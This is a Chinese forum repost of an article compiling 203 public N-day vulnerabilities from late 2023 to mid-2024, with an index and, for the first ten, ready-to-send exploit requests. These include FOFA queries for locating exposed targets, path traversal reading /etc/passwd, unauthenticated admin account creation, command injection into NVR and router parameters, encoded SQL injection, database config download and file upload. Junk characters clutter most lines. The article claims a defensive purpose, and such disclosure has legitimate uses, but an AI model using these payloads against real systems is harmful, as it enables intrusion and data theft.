找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 5203|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406
$ ?, |$ d) {2 f" J道一安全 2024-06-05 07:41 北京
; d* ?- ~# \) M7 L& W以下文章来源于网络安全新视界 ,作者网络安全新视界9 x! x' d# j. @4 [8 k- O' E% X
8 q+ W& {. f/ q6 F0 B; ?5 \
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
3 x5 o" c! n0 l6 A! A
4 @, c- V$ z3 R漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。8 m2 o5 w: x  y  x
) \/ e. l7 v# ~6 R, t
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
6 I8 f& y! v6 R+ I' u- q* X  ]" c3 U& }4 X, `  p
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。  q+ K$ |) }5 H& W# m, ~
/ |& @% M( `2 e9 H& p
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
5 f; y/ f! `* E) w( i$ j/ n% T6 X% s. X2 g) ]2 x: ?0 d
& L( ^) H1 m% U  ~& H
声明) D4 S4 y' T' E! A! m

8 T8 e* i/ k( t为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。* }" O9 q4 G8 m6 p

8 n. @6 m9 ~6 |; C+ `% S) C/ O3 x有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。% ]* Z& x' @4 Y; e
6 x7 |' T2 B+ Z6 b# z
$ n3 H( n1 k; L# Q& Z, f% i& `8 ~! {/ G

8 a( i* n8 t1 Y& X; B: C7 D. q3 x$ A目录! N% k3 q: B# q. d, M& t) j* G
' C0 P/ t" k  n5 I2 V" F2 Y( k
014 k* K% O- x9 \3 E
5 ~$ z. \, g# H! d
1. StarRocks MPP数据库未授权访问
' w: C$ |- W, v( u  Y3 B% D2. Casdoor系统static任意文件读取  g4 p0 [& i% G- i
3. EasyCVR智能边缘网关 userlist 信息泄漏
" {  z' w1 M7 ?: L, Y$ p* D5 x3 U# I7 d4. EasyCVR视频管理平台存在任意用户添加
$ [: {: T; E9 i1 y$ \5. NUUO NVR 视频存储管理设备远程命令执行) ?8 n+ P: X3 M1 f; P( n& g
6. 深信服 NGAF 任意文件读取/ S/ N$ {, |) ?+ l2 f8 S; Y' C
7. 鸿运主动安全监控云平台任意文件下载1 [+ K0 B* i0 i
8. 斐讯 Phicomm 路由器RCE
, m. M, p8 T+ c3 B, x8 |( @9. 稻壳CMS keyword 未授权SQL注入$ T4 I9 N( \. W% [, h; ]# e# p! j
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
4 w6 e$ ?4 W2 ^( X' J11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
. L6 G5 B/ H$ G( O2 T. ], i12. Jorani < 1.0.2 远程命令执行
3 _( w5 R2 i) {9 n13. 红帆iOffice ioFileDown任意文件读取
! j" J# V3 u8 `" G5 b0 E+ n; `( B8 Q14. 华夏ERP(jshERP)敏感信息泄露4 H5 g1 v7 I( u+ a. w
15. 华夏ERP getAllList信息泄露
/ }" R; e3 ~/ H16. 红帆HFOffice医微云SQL注入
/ h: |  I# h6 H) [' |- b' d. F17. 大华 DSS itcBulletin SQL 注入& n- `$ `+ q: n& M, Z
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露# E2 w, ^9 A6 ]( ]( r) d( v9 Z+ U
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
7 l8 k% Q2 Z. C, `20. 大华ICC智能物联综合管理平台任意文件读取
, x: {1 v5 d# G+ G% Z& c21. 大华ICC智能物联综合管理平台random远程代码执行
9 q3 c4 r) K9 W4 G; k22. 大华ICC智能物联综合管理平台 log4j远程代码执行
9 q& x5 ~" E% c0 z) a9 D$ V1 ^23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
- \( F/ J! Y: q0 G9 P( x24. 用友NC 6.5 accept.jsp任意文件上传
* \) P' ]4 A& s+ y9 {  a0 K25. 用友NC registerServlet JNDI 远程代码执行+ y, m" p2 `8 i& e
26. 用友NC linkVoucher SQL注入7 u3 h2 f% u- B7 S1 l  ?
27. 用友 NC showcontent SQL注入
, i1 F- s9 t2 Z( o28. 用友NC grouptemplet 任意文件上传9 I! M+ K5 w) t6 r* d4 Z% t
29. 用友NC down/bill SQL注入$ K  Z9 {  k! e! j4 U, A, C  Z' f
30. 用友NC importPml SQL注入
3 _- A1 e0 f6 I% s. M31. 用友NC runStateServlet SQL注入
$ T6 V  ~# i6 @% J32. 用友NC complainbilldetail SQL注入
: f, A. z* A% Y5 d  S" h3 W33. 用友NC downTax/download SQL注入' P" |' B1 E( F4 T
34. 用友NC warningDetailInfo接口SQL注入  v. u+ z" O; H- }" M8 [
35. 用友NC-Cloud importhttpscer任意文件上传
  B0 V2 K7 W" z, b5 Z36. 用友NC-Cloud soapFormat XXE
8 S% x. Q. z5 p; g# q( U37. 用友NC-Cloud IUpdateService XXE% h, `- K7 W+ b7 V
38. 用友U8 Cloud smartweb2.RPC.d XXE
7 g' r$ W' G1 x1 E# h* v39. 用友U8 Cloud RegisterServlet SQL注入
/ B; K: K, @; s3 g* p: d40. 用友U8-Cloud XChangeServlet XXE
6 v5 L0 k2 m( _$ T# ?' w3 k6 u41. 用友U8 Cloud MeasureQueryByToolAction SQL注入. C3 D# Y$ G# U  v
42. 用友GRP-U8 SmartUpload01 文件上传
. O7 L' |  W& T! i43. 用友GRP-U8 userInfoWeb SQL注入致RCE
# O; Z7 X3 C0 l( v  a$ D  E9 E44. 用友GRP-U8 bx_dj_check.jsp SQL注入2 k. G8 H( ?3 V& t* A
45. 用友GRP-U8 ufgovbank XXE
- r1 g' f. ?( S6 {46. 用友GRP-U8 sqcxIndex.jsp SQL注入& C! u& z/ f6 L0 O8 a" G" y
47. 用友GRP A++Cloud 政府财务云 任意文件读取
3 P( n) X% b3 k  B7 v$ e48. 用友U8 CRM swfupload 任意文件上传
  c. C" b- x/ o6 v5 u49. 用友U8 CRM系统uploadfile.php接口任意文件上传$ Z4 p3 E2 S, ~7 r; L' y! d! D5 u
50. QDocs Smart School 6.4.1 filterRecords SQL注入
+ x  Q( c0 j0 i, F1 i4 b% r51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
  T" y, |0 D( c2 ^! y52. 泛微E-Office json_common.php sql注入& I1 D$ \6 q, b" t( k: n
53. 迪普 DPTech VPN Service 任意文件上传
. d& Q/ V3 M2 O# D: g2 ?54. 畅捷通T+ getstorewarehousebystore 远程代码执行% k0 |* @1 h! u- j0 S
55. 畅捷通T+ getdecallusers信息泄露) ^0 A4 w0 F4 c" }1 t7 v. J
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE8 O7 ~, r8 Q3 G/ U( f$ }% B4 `6 E* i
57. 畅捷通T+ keyEdit.aspx SQL注入1 F) `& G7 @. M
58. 畅捷通T+ KeyInfoList.aspx sql注入
& R- D% z/ x" o0 k3 e- i  \% M" k59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
- r# e; S2 G' ^& r60. 百卓Smart管理平台 importexport.php SQL注入" B3 W8 J0 p7 M" Q* P3 i
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传5 ~# x4 S# a% z2 x; n  B0 Q
62. IP-guard WebServer 远程命令执行
6 U+ p  {! r1 \6 g6 f3 m63. IP-guard WebServer任意文件读取
1 [$ d8 k$ R; v$ s$ d* K64. 捷诚管理信息系统CWSFinanceCommon SQL注入; M$ \& s9 D' P
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
2 n1 S* R! s/ ?* a$ C4 ^66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入. V( N0 U6 {+ ?1 N% d
67. 万户ezOFFICE wpsservlet任意文件上传+ M  G9 o, d( _2 d8 S4 y- w0 j
68. 万户ezOFFICE wf_printnum.jsp SQL注入/ |* m9 g& r* T
69. 万户 ezOFFICE contract_gd.jsp SQL注入
9 S8 `2 P0 |" w70. 万户ezEIP success 命令执行
: n) n1 R3 B5 B, `71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
) |- ?% P4 n; D  H. p3 L72. 致远OA getAjaxDataServlet XXE- h6 t1 R4 \( @5 w% Y! ?; H$ p
73. GeoServer wms远程代码执行
* b* Y$ Y; m8 Z5 A( |74. 致远M3-server 6_1sp1 反序列化RCE; C/ k" G4 @0 U' U- G) M( v
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! l; a/ U4 r" f6 Y# I
76. 新开普掌上校园服务管理平台service.action远程命令执行
# a# e6 O, R# S6 `77. F22服装管理软件系统UploadHandler.ashx任意文件上传1 n' S' G% A! Z7 G. E
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传/ I* ?, l" S7 C) B
79. BYTEVALUE 百为流控路由器远程命令执行
7 f  y+ [  q* ~$ f80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
4 ]; B$ T! y% O  i* I: [$ q81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
! q: T- N! |9 I, Q82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行. M& L) G; V& j! b
83. JeecgBoot testConnection 远程命令执行
% `3 z  ~! x* T( {2 W, G1 H2 ~84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
. P7 z" t# T/ Y+ y5 k6 B85. SysAid On-premise< 23.3.36远程代码执行6 }0 K/ G# z& ?0 [3 p
86. 日本tosei自助洗衣机RCE0 F8 e& M* B2 @% D6 m$ R4 k
87. 安恒明御安全网关aaa_local_web_preview文件上传
( {0 S( i1 v5 W5 A5 W6 z6 t6 C88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ `* j: ?6 x& W  l89. 致远互联FE协作办公平台editflow_manager存在sql注入  u. b2 G: ?' E7 D) n6 e. k
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行: |! |' e( B: q, i$ Y
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取8 w% N: P3 M4 r
92. 海康威视运行管理中心session命令执行
% M- L6 Q# N3 t0 G93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传/ i$ Q7 }, v0 Q. Z6 g$ N" ]: S
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
+ T2 U, K$ `4 c, `$ b95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行( a/ _* P# j2 i! l! A5 P
96. Apache OFBiz  18.12.11 groovy 远程代码执行) F5 g6 s! [; j
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
7 Y  y) }9 T. t7 G9 q/ V! I! r0 D98. SpiderFlow爬虫平台远程命令执行3 i& F5 f$ ]) k' M# I' a
99. Ncast盈可视高清智能录播系统busiFacade RCE6 S' ~+ l& V& i
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" a+ ^' z) T3 n3 y( x101. ivanti policy secure-22.6命令注入! K" w& }0 e( C8 q- a
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行  i: W- k: T% R  z8 z
103. Ivanti Pulse Connect Secure VPN XXE' G, ^9 u4 C! J) ~' {
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露9 N; _0 V4 c5 c
105. SpringBlade v3.2.0 export-user SQL 注入
3 M7 c3 J6 K2 Y4 _, y7 I106. SpringBlade dict-biz/list SQL 注入$ [- a7 P% W5 g
107. SpringBlade tenant/list SQL 注入
; C. X: O  D2 M  R0 G108. D-Tale 3.9.0 SSRF
) `" C( |/ M1 g6 @109. Jenkins CLI 任意文件读取% `" @3 j# C1 E7 p8 g  w$ _
110. Goanywhere MFT 未授权创建管理员2 n2 N, ?  X; v5 d6 ~; r& B* c
111. WordPress Plugin HTML5 Video Player SQL注入0 l2 H* n! C$ v) c
112. WordPress Plugin NotificationX SQL 注入
' h9 n0 @" n0 h113. WordPress Automatic 插件任意文件下载和SSRF
3 E$ T$ e0 `' V2 x114. WordPress MasterStudy LMS插件 SQL注入7 ?, T. B0 j$ j/ O
115. WordPress Bricks Builder <= 1.9.6 RCE" W/ m8 F' Y8 w. L
116. wordpress js-support-ticket文件上传
1 [1 a# k4 o4 N2 P+ s4 [- v: o1 c117. WordPress LayerSlider插件SQL注入  t! j" c- A$ n" K0 M; N: X+ L
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
) ^1 _; z  n- S) d3 Z/ m1 S( w3 K119. 北京百绰智能S20后台sysmanageajax.php sql注入/ g; Y* x( _! Q$ d, u, }
120. 北京百绰智能S40管理平台导入web.php任意文件上传
- A3 J9 y9 o; p, n& Q" p3 b# n121. 北京百绰智能S42管理平台userattestation.php任意文件上传
5 Y) o; D$ I3 _& S: T# S% T122. 北京百绰智能s200管理平台/importexport.php sql注入) X; o# l0 ^; x) N2 X
123. Atlassian Confluence 模板注入代码执行
+ \1 [3 ^2 [- |* b# |; g124. 湖南建研工程质量检测系统任意文件上传% ]+ ~! ?% r. _" D
125. ConnectWise ScreenConnect身份验证绕过: P4 [  n  u" [! U& A$ q7 _3 H
126. Aiohttp 路径遍历& W- I( R0 B# ?1 ^* r" r2 t
127. 广联达Linkworks DataExchange.ashx XXE1 T7 \8 ]2 `0 P* K$ u
128. Adobe ColdFusion 反序列化
7 a* d, F, R, A" a9 G129. Adobe ColdFusion 任意文件读取* P4 }. x3 o6 o4 H
130. Laykefu客服系统任意文件上传5 k1 q; I/ j1 |
131. Mini-Tmall <=20231017 SQL注入& [% Q% A# M& S7 ~$ h. ~
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
7 U" F$ y! I8 k6 a, X& u4 a133. H5 云商城 file.php 文件上传
9 @# O' |3 v& [& M* W/ ~134. 网康NS-ASG应用安全网关index.php sql注入' {# h' a6 g4 n5 K! B
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入4 `7 G3 U8 i1 I* w2 x
136. NextChat cors SSRF- N3 s1 ^9 ]  I5 |
137. 福建科立迅通信指挥调度平台down_file.php sql注入; T, X: b  b& C1 p
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
' W- x6 t. u9 u( b7 P139. 福建科立讯通信指挥调度平台editemedia.php sql注入' ?1 U6 c7 B7 p. |% }2 o
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入4 j# t# b+ ?* u& [" q% C
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
/ K& p8 G' Z) ?142. CMSV6车辆监控平台系统中存在弱密码% t$ _% n) E+ Z9 q0 w
143. Netis WF2780 v2.1.40144 远程命令执行
* w4 p' d3 C4 D+ h& @144. D-Link nas_sharing.cgi 命令注入
5 u6 m8 n2 J% t0 [& U, ~7 R3 z  x145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
# y+ s/ F, L+ x6 T2 j3 p4 L& Q146. MajorDoMo thumb.php 未授权远程代码执行  i) E4 a. X7 R  S/ T' ^
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
5 M- ~$ H" T8 E3 p148. CrushFTP 认证绕过模板注入  [5 t+ W1 m( Y5 `* u- N% o
149. AJ-Report开源数据大屏存在远程命令执行
1 M5 N( U7 ?7 r- ~2 t6 h* t/ Z150. AJ-Report 1.4.0 认证绕过与远程代码执行
) [5 |' Q! O# X: b1 x151. AJ-Report 1.4.1 pageList sql注入
7 [7 i2 ^* I  o$ y0 `; y( f152. Progress Kemp LoadMaster 远程命令执行
% u4 A) z7 D. q$ |5 |153. gradio任意文件读取
; Z& }) Q$ A  z( E4 v, \5 y0 D! \154. 天维尔消防救援作战调度平台 SQL注入
& a3 P: s* P6 d9 \+ f. d155. 六零导航页 file.php 任意文件上传% N+ v1 _7 \: Z' ~2 m8 K
156. TBK DVR-4104/DVR-4216 操作系统命令注入5 F8 E* L8 v% g* ]
157. 美特CRM upload.jsp 任意文件上传
% q2 O5 O" @" ^3 _158. Mura-CMS-processAsyncObject存在SQL注入
( O3 q* F, P  \' q159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传7 O1 h! R* r7 Z4 x1 }( _4 ~6 e- Z
160. Sonatype Nexus Repository 3目录遍历与文件读取
) p0 [) f) U; J161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
3 {4 A% O: m( t- E  w162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
0 V9 p/ d) v2 f- N6 j163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
) r: R9 ]: h- ~) K164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传6 r  F) m0 T4 m- S- ^! m  e
165. OrangeHRM 3.3.3 SQL 注入
, X  |/ S- O. B6 O4 f' ]% t  F! D166. 中成科信票务管理平台SeatMapHandler SQL注入
7 v# v( F' J  {/ E167. 精益价值管理系统 DownLoad.aspx任意文件读取& ?/ r7 s& ?" G" s
168. 宏景EHR OutputCode 任意文件读取+ c& W: a2 U- `; {; }! y4 o. Z+ X' L
169. 宏景EHR downlawbase SQL注入
4 Q% K0 G" ^/ t3 S170. 宏景EHR DisplayExcelCustomReport 任意文件读取
  E# S8 X, p8 V! n# j% G171. 通天星CMSV6车载定位监控平台 SQL注入
, y: ~2 ?' U0 w0 w172. DT-高清车牌识别摄像机任意文件读取$ O0 J4 ^1 g7 `/ c( a1 v
173. Check Point 安全网关任意文件读取
" c  S2 n# A# O: i6 {* s! F0 }174. 金和OA C6 FileDownLoad.aspx 任意文件读取8 W+ {: [- k8 o2 V% ^$ G  a
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入4 [6 C8 P6 i( P2 P" o- s
176. 电信网关配置管理系统 rewrite.php 文件上传
8 H* N+ O) f  Z( \2 T177. H3C路由器敏感信息泄露
" }! O0 I! [4 R& p% U2 w7 T% \178. H3C校园网自助服务系统-flexfileupload-任意文件上传
8 t+ M+ q( H% _/ ?0 e179. 建文工程管理系统存在任意文件读取
: h3 h( }/ v$ w" w0 H1 o180. 帮管客 CRM jiliyu SQL注入
6 {; W) K+ O4 Y( u181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入6 p2 a4 n* E. a8 }
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
3 B1 k5 u7 f; v- }, }, s$ {183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
) ?7 U2 S& M; M2 m" I" j7 ?184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加$ p$ r9 _& H0 z/ A
185. 瑞友天翼应用虚拟化系统SQL注入+ D: [" a6 A) F9 u- u
186. F-logic DataCube3 SQL注入
/ R: H. O7 V9 j" u8 }187. Mura CMS processAsyncObject SQL注入1 N) U2 K  X  W( {
188. 叁体-佳会视频会议 attachment 任意文件读取0 Z6 t; D0 C# h0 i" L$ h- @
189. 蓝网科技临床浏览系统 deleteStudy SQL注入8 F3 i! P/ B, m
190. 短视频矩阵营销系统 poihuoqu 任意文件读取. M& ~! J0 t2 @" {* E6 Z
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
1 Q/ c  s5 L$ Q1 y192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
3 h! y4 Q4 W2 T7 d: N& ?# S193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行! E5 v  a6 F* l7 F+ _
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传3 `3 K; q( P! v  }
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行/ X5 H* K& K0 f/ f
196. 河南省风速科技统一认证平台密码重置
! x& U9 t- e/ D; w; S$ m197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入9 F5 z: i3 R, i7 I& `) E+ z
198.  阿里云盘 WebDAV 命令注入
) n- |& T' j0 |) |199. cockpit系统assetsmanager_upload接口 文件上传
  t; S7 x& Q+ }0 u; y+ R* g! j200. SeaCMS海洋影视管理系统dmku SQL注入3 r9 y. Y5 u+ h( w- ?
201. 方正全媒体新闻采编系统 binary SQL注入  \! i  E0 e5 J! e7 I  V8 y
202. 微擎系统 AccountEdit任意文件上传' u8 f$ ?: Z  N  ^# h1 w. b
203. 红海云EHR PtFjk 文件上传5 j9 L) b3 I* w9 r6 q3 T- C" c9 W( I
# O3 v# ^- k1 y& }1 A) T+ v, R0 r
POC列表- d5 ?7 E5 ~3 g/ k; z
/ U- L8 @% Z- p* Z2 ?/ H
02+ S6 z9 _# e8 n$ }% c4 k6 ~4 p9 m
' Q0 e: C' z6 Z$ f
1. StarRocks MPP数据库未授权访问
% {5 ^7 o1 N: {4 N7 p! HFOFA :title="StarRocks"
7 G, y0 |0 n( v" BGET /mem_tracker HTTP/1.1
' G; T. L+ f5 l- {$ }Host: URL2 V& ?) C4 r) z9 y" w
2 ^2 O) e; U" {$ P' Q4 T
( s4 ^' ]6 }* Y# w
2. Casdoor系统static任意文件读取
4 l" y( x) i0 ^  }& i/ E+ K* F- f$ h+ l) JFOFA :title="Casdoor"
) X+ e+ M( X, X: kGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1' k2 \$ f+ [4 q# O; {9 F" y' r
Host: xx.xx.xx.xx:9999
! i- }! Z) ?' [- L0 B! ~: WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& w, P' P4 b; m/ w
Connection: close
$ C  L6 D7 S% s+ z$ @Accept: */*; q1 g+ [# u- b+ t$ W9 s$ p
Accept-Language: en# ^9 C# D' {4 _+ F2 {; L
Accept-Encoding: gzip
" Z" y, ]- U5 w4 n( N: A' m; c# K' i* W" m3 {- {
5 @( j$ t5 J0 Z  e/ \+ F" A
3. EasyCVR智能边缘网关 userlist 信息泄漏
1 g. ]% K& T, A8 iFOFA :title="EasyCVR"
5 O( _/ R: x  C) a; v( y3 ?# FGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
3 N6 C' l, o! F& OHost: xx.xx.xx.xx
, y& S  D2 d! b6 N1 p& }% o1 p' I5 j& N

4 K  V9 G  |' P4. EasyCVR视频管理平台存在任意用户添加
6 [' t& w5 b" J: `, @1 K& \6 jFOFA :title="EasyCVR"
2 b$ A. A% I( ]% X2 e5 @7 A, y4 R
, V9 Z9 q( }7 q1 M* c1 x6 npassword更改为自己的密码md5
+ t- E( z: E9 l, K3 U' v9 Z" I, J* @POST /api/v1/adduser HTTP/1.1" a8 Z' h5 {' N, s/ n
Host: your-ip4 \* U! ]$ D' s( ]
Content-Type: application/x-www-form-urlencoded; charset=UTF-89 O: @# v. H2 l5 l8 r9 o. ]# D

; f0 t# K$ P* @3 b+ T0 g8 H) Wname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1; g: D& H7 j7 J1 |; d! z  m" r0 ]
4 o3 E/ |  b4 Q. c4 P

" c& u0 ]( a) [* |$ c+ P5. NUUO NVR 视频存储管理设备远程命令执行) R4 I2 Y6 n$ \+ m0 ?
FOFA:title="Network Video Recorder Login"
* a+ y+ E% I/ r  b( |GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: G2 q* `9 S" }+ T9 A1 H5 sHost: xx.xx.xx.xx( Y+ a$ Z6 g5 p, [

, b* v) M# U3 D0 c- `! D* U, _) R: _
9 S! p) M- s& \) K: [( z0 K6. 深信服 NGAF 任意文件读取
, V1 w5 ?* T( Y6 r" U# kFOFA:title="SANGFOR | NGAF"
/ Z4 M- z9 D, c' ZGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
5 j5 h9 R- j' e: ]3 ~7 f9 a# }Host:
; d# p; G1 [0 F  {5 X6 j; r+ b  R  B% B% o- z0 {* v
/ D1 _7 |3 e- Y1 O& X; h0 \9 o
7. 鸿运主动安全监控云平台任意文件下载0 k# G* Q) P  q( v0 `
FOFA:body="./open/webApi.html"
, ?. {/ f5 a# m3 mGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
$ f- M0 u! h3 S- `& _3 }Host:
( M2 B3 J0 R- O, C  N
  Q4 c6 H8 P( `( ^- R' t3 d0 ?! }; b+ e4 Y
8. 斐讯 Phicomm 路由器RCE
$ U% K: L3 T. wFOFA:icon_hash="-1344736688"
. r; E/ S: M2 Y% L" w1 G默认账号admin登录后台后,执行操作
# E# F" _! ^+ m* X' ]POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1: ?9 _# o# r4 {
Host: x.x.x.x
) f/ _& R6 p- p; L- _. PCookie: sysauth=第一步登录获取的cookie
$ V6 ~. ]" D1 u; Z: D0 o) AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
" ~4 `2 h7 ]6 R' q2 [' J% vUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36+ j- S& G% B, ?& A" r) H
1 @7 v  \6 g; B8 ?
------WebKitFormBoundaryxbgjoytz# P5 g% n, q9 ]6 v+ b* [
Content-Disposition: form-data; name="wifiRebootEnablestatus"
& \( c+ Z" N. O4 |9 \$ u$ R0 R4 L- l& x# J: t+ a
%s; p9 ?' n0 o0 p% `
------WebKitFormBoundaryxbgjoytz+ F- G: |" y, P# W; V! x! s  Y
Content-Disposition: form-data; name="wifiRebootrange". s4 n; _+ ]9 W6 A! f
9 o3 A: ]# W5 J7 a7 Y4 E0 `0 f; b
12:00; id;
- S9 }8 y; X1 [------WebKitFormBoundaryxbgjoytz
, a2 T% ]* z: G. a" gContent-Disposition: form-data; name="wifiRebootendrange"! W# ^! }  _' y& X& \+ C0 g, ~

" ?# ?6 }" @  z* E1 C%s:
2 C* E6 v6 }- K8 n- S* X------WebKitFormBoundaryxbgjoytz! S/ b+ M  Q. P" S2 ~, {  b
Content-Disposition: form-data; name="cururl2"
1 K7 E+ O; x, n: U3 k" Q+ U
  m, T4 b$ H! l3 m9 v
; j/ h7 d3 D0 Q3 g------WebKitFormBoundaryxbgjoytz--
4 T; w7 c. g( W8 \( A! |8 X$ q9 f9 t0 i8 |
, A- l. B1 a" I/ }1 X# n
9. 稻壳CMS keyword 未授权SQL注入+ C: |1 I5 U8 s/ I/ Q0 D  a7 M) V
FOFA:app="Doccms"
) ]+ F+ s3 |( f1 `+ z0 B& GGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
. \+ F( i- r3 c6 S+ `+ WHost: x.x.x.x
7 B, p. K# r# p
0 |$ |8 Q8 K, d1 V7 N# E) o  f# Z+ s
payload为下列语句的二次Url编码) i" u9 a1 p, m- Q; a

4 I; i$ d4 \2 s+ g/ U) d' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
' Z- `/ z# a# ~5 S6 ~+ `0 D
3 D( u2 q9 [2 A- d4 u; v10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
: C$ i; e- s, ?+ fFOFA:icon_hash="953405444"
0 a# E% E9 R$ |. B) N7 U" d( _
* k. x' y5 b4 H- N  X; ~( U文件上传后响应中包含上传文件的路径* p9 \' Q. |# _4 A
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ f; @# i, v7 |1 {% }Host: x.x.x.x:xx9 h: e+ p" \* S; A; u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ r1 C' {- p+ w9 B  XContent-Length: 1974 K* \* l! p$ J/ J2 [7 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
" e( n" U( `. d: V& n7 nAccept-Encoding: gzip, deflate
8 a: `& K) C- _' U1 F* UAccept-Language: zh-CN,zh;q=0.91 O; X3 _; j+ {
Connection: close3 {% O9 j$ t8 @4 C% T6 s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
* H+ ?9 ~6 P4 J9 l
7 X! N" f( O+ j: B+ |------WebKitFormBoundaryxdgaqmqu5 B  x* O) X7 C; J; U9 r9 t
Content-Disposition: form-data; name="file"filename="icfitnya.txt". _. O9 f" }. E  Z8 u3 ?
Content-Type: text/html  C% I2 L+ E' \) [2 L* p

( E& l7 _  K; e# o6 o; ]: Q  Sjmnqjfdsupxgfidopeixbgsxbf/ w; q* H- G$ U! w# c3 U
------WebKitFormBoundaryxdgaqmqu--5 w" I; Z+ m  y8 A9 o0 X! s
- `+ V# B1 i- v4 F

